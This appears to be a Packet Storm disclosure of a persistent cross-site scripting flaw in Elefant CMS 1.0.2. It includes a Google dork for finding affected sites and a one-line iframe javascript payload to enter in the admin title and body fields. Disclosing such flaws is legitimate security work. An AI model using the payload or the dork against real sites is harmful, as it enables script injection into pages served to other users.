Elefant CMS version 1.0.2 suffers from a persistent cross site scripting vulnerability.
b0ecd7301962ed7d52d898be61bd90f3b694db9b9dd74b9bbcd0826c24a4b35d
elefantcms
vendor: https://www.elefantcms.com
Version: Latest stable release: 1.0.2
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: www.epsilonlambda.wordpress.com
Google dork: Powered by Elefant CMS
------------------------------------------------------------------------------------------------------------------------------------------------------------
Description about the CMS
Elefant is a content management system written in PHP that includes a modern PHP framework for web developers. Elefant is easy-to-use and straight-forward for all levels of users. It is also secure, fast, well-documented, and well-tested.
Elefant's admin tools are minimalist without sacrificing flexibility. We wanted a system that even our moms could use with little or no help, but that power users will enjoy using too. So we made hard choices to keep a lot of needless complexity out.
Instead, we focus on providing a solid editing experience out-of-the-box, well-considered default settings, and just the right set of features to satisfy 90% of the sites we encounter, as opposed to sacrificing simplicity in order to solve every possible edge case.
------------------------------------------------------------------------------------------------------------------------------------------------------------
* PERSISTENT XSS VULNERABILITY :
In the admin panel, input the TITLE and BODY with the following code, leading to Persistent XSS exploit in the CMS
Exploit: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
------------------------------------------------------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed